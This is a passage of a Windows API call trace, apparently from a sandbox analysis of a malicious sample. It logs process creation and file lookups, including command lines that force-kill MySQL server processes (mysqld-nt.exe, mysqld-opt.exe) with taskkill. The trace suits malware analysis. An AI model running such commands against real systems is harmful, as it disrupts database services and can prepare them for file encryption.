dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im mysqld-nt.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x130, hThread=0x158, dwProcessId=0xc7c, dwThreadId=0x6c4)) returned 1 [0190.868] SetEvent (hEvent=0x150) returned 1 [0190.869] CloseHandle (hObject=0x158) returned 1 [0190.869] CloseHandle (hObject=0x154) returned 1 [0190.869] CloseHandle (hObject=0x144) returned 1 [0190.869] CloseHandle (hObject=0x140) returned 1 [0190.869] CloseHandle (hObject=0x13c) returned 1 [0190.869] CloseHandle (hObject=0x138) returned 1 [0190.869] CloseHandle (hObject=0x134) returned 1 [0190.869] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0xffffffff) returned 0x0 [0193.383] SetEvent (hEvent=0x150) returned 1 [0193.383] GetExitCodeProcess (in: hProcess=0x130, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0193.383] GetProcessTimes (in: hProcess=0x130, lpCreationTime=0x12466d80, lpExitTime=0x12466d88, lpKernelTime=0x12466d90, lpUserTime=0x12466d98 | out: lpCreationTime=0x12466d80, lpExitTime=0x12466d88, lpKernelTime=0x12466d90, lpUserTime=0x12466d98) returned 1 [0193.383] CloseHandle (hObject=0x130) returned 1 [0193.384] SetEvent (hEvent=0x128) returned 1 [0193.384] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0193.401] SetEvent (hEvent=0x150) returned 1 [0193.401] SetEvent (hEvent=0x128) returned 1 [0193.401] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bbe10, nSize=0x64 | out: lpBuffer="") returned 0x35 [0193.402] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124474f8 | out: lpFileInformation=0x124474f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.402] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.403] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12447548 | out: lpFileInformation=0x12447548*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.403] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.403] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447598 | out: lpFileInformation=0x12447598*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.403] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.403] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124475e8 | out: lpFileInformation=0x124475e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.403] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.403] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12447638 | out: lpFileInformation=0x12447638*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.403] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.404] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12447688 | out: lpFileInformation=0x12447688*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.404] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.404] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124476d8 | out: lpFileInformation=0x124476d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.404] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.404] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12447728 | out: lpFileInformation=0x12447728*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.404] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.404] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12447778 | out: lpFileInformation=0x12447778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.404] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.405] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124477c8 | out: lpFileInformation=0x124477c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.405] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.405] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12447818 | out: lpFileInformation=0x12447818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.405] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.405] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12447868 | out: lpFileInformation=0x12447868*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.405] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0193.405] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123bbee0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0193.405] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124478b8 | out: lpFileInformation=0x124478b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0193.406] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247c000, nSize=0x64 | out: lpBuffer="") returned 0x35 [0193.406] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447908 | out: lpFileInformation=0x12447908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0193.406] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0193.406] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0193.406] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0193.406] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0193.406] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0193.407] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0193.407] GetEnvironmentStringsW () returned 0x8ea900* [0193.407] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0193.407] GetCurrentProcess () returned 0xffffffff [0193.407] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124496e0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124496e0*=0x13c) returned 1 [0193.408] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124496e4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124496e4*=0x140) returned 1 [0193.408] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124496e8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124496e8*=0x144) returned 1 [0193.408] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im mysqld-opt.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12486000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im mysqld-opt.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x158, hThread=0x154, dwProcessId=0xc40, dwThreadId=0x64c)) returned 1 [0193.452] SetEvent (hEvent=0x150) returned 1 [0193.452] CloseHandle (hObject=0x154) returned 1 [0193.452] CloseHandle (hObject=0x144) returned 1 [0193.452] CloseHandle (hObject=0x140) returned 1 [0193.452] CloseHandle (hObject=0x13c) returned 1 [0193.453] CloseHandle (hObject=0x130) returned 1 [0193.453] CloseHandle (hObject=0x134) returned 1 [0193.453] CloseHandle (hObject=0x138) returned 1 [0193.453] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0xffffffff) returned 0x0 [0200.533] SetEvent (hEvent=0x150) returned 1 [0200.533] GetExitCodeProcess (in: hProcess=0x158, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0200.534] GetProcessTimes (in: hProcess=0x158, lpCreationTime=0x1245d400, lpExitTime=0x1245d408, lpKernelTime=0x1245d410, lpUserTime=0x1245d418 | out: lpCreationTime=0x1245d400, lpExitTime=0x1245d408, lpKernelTime=0x1245d410, lpUserTime=0x1245d418) returned 1 [0200.535] CloseHandle (hObject=0x158) returned 1 [0200.535] SetEvent (hEvent=0x128) returned 1 [0200.536] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0200.543] SetEvent (hEvent=0x150) returned 1 [0200.543] SetEvent (hEvent=0x128) returned 1 [0200.544] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9e10, nSize=0x64 | out: lpBuffer="") returned 0x35 [0200.544] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124514a8 | out: lpFileInformation=0x124514a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.546] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.546] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124514f8 | out: lpFileInformation=0x124514f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.546] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.546] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451548 | out: lpFileInformation=0x12451548*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.546] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.546] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12451598 | out: lpFileInformation=0x12451598*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.546] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.546] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124515e8 | out: lpFileInformation=0x124515e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.546] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.547] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12451638 | out: lpFileInformation=0x12451638*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.547] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.547] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12451688 | out: lpFileInformation=0x12451688*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.547] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.547] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124516d8 | out: lpFileInformation=0x124516d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.547] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.547] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12451728 | out: lpFileInformation=0x12451728*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.547] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.547] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12451778 | out: lpFileInformation=0x12451778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.547] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.548] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124517c8 | out: lpFileInformation=0x124517c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.548] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.548] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12451818 | out: lpFileInformation=0x12451818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 